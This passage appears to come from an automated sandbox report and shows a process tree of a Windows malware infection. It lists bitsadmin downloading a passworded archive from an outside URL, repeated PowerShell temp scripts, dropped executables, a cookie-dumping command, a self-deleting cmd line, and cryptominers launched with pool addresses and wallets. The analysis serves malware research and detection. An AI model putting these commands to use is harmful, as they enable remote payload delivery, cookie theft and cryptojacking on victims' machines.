                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Checks for any installed AV software in registry
                                                                                                                                                                                                                              PID:6068
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                                                                                              PID:7120
                                                                                                                                                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pm6vEf0V1jawU56m -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                              PID:5500
                                                                                                                                                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pziF0KFaFHeETEUi -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:5152
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:7156
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:6436
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:3852
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:6888
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:6448
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\lZqTxGDSUx\lZqTxGDSUx.dll" lZqTxGDSUx
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        PID:5288
                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\lZqTxGDSUx\lZqTxGDSUx.dll" lZqTxGDSUx
                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                          PID:5408
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:6080
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                          PID:6100
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:6916
                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                            PID:5648
                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                              PID:4216
                                                                                                                                                                                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                              PID:6236
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zis0qw4p.dxr\005.exe & exit
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:4916
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\zis0qw4p.dxr\005.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\zis0qw4p.dxr\005.exe
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:6136
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\odwjjf3w.otq\ifhwwyy.exe & exit
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:5072
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\odwjjf3w.otq\ifhwwyy.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\odwjjf3w.otq\ifhwwyy.exe
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:6648
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:6988
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:6460
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xpq4s22q.wtk\toolspab1.exe & exit
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:6636
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\xpq4s22q.wtk\toolspab1.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\xpq4s22q.wtk\toolspab1.exe
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:6968
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\xpq4s22q.wtk\toolspab1.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\xpq4s22q.wtk\toolspab1.exe
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                    PID:7144
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                        PID:4336
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                          PID:4804
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                            ping 127.0.0.1
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                            PID:5068
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                        PID:4424
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:5284
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:6572
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:4584
                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                      PID:2140
                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                        PID:3616
                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                        PID:2696
                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                      PID:4820
                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                      PID:4928
                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                      PID:2716
                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      PID:4376
                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      PID:5188
                                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      PID:5928
                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 53954964FC6AB29446787807FAE3418B C
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        PID:2312
                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 8CF6799CB5D851DEA2E041DF4F888327
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        PID:5676
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                          "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                          PID:5180
                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 549696A14B8067A5127BD5D2ABB6EC07 E Global\MSI0000
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        PID:5892
                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      PID:5028
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9DF6.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9DF6.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      PID:3300
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9DF6.exe
                                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                          PID:4144
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                                                                                                                                                                                                                                            "{path}"
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                            PID:192
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\kernel.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\kernel.exe" -o pool.minexmr.com:4444 -u 49sjJJDaUPKiSdVsdUR1R51v1ovWXrAZw3QYEDay7qVt3gqxju2anikWRWkZ8ymFfzUyCvw27WP8WV7QvdYVSSrJH26nsXa -p x --max-cpu-usage 40
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:656
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                              PID:2280
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                              PID:3816
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                              PID:7012
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:2676
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:4788
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:2008
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:5824
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:2336
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:4476
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:4148
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:3332
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:6816
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:5608
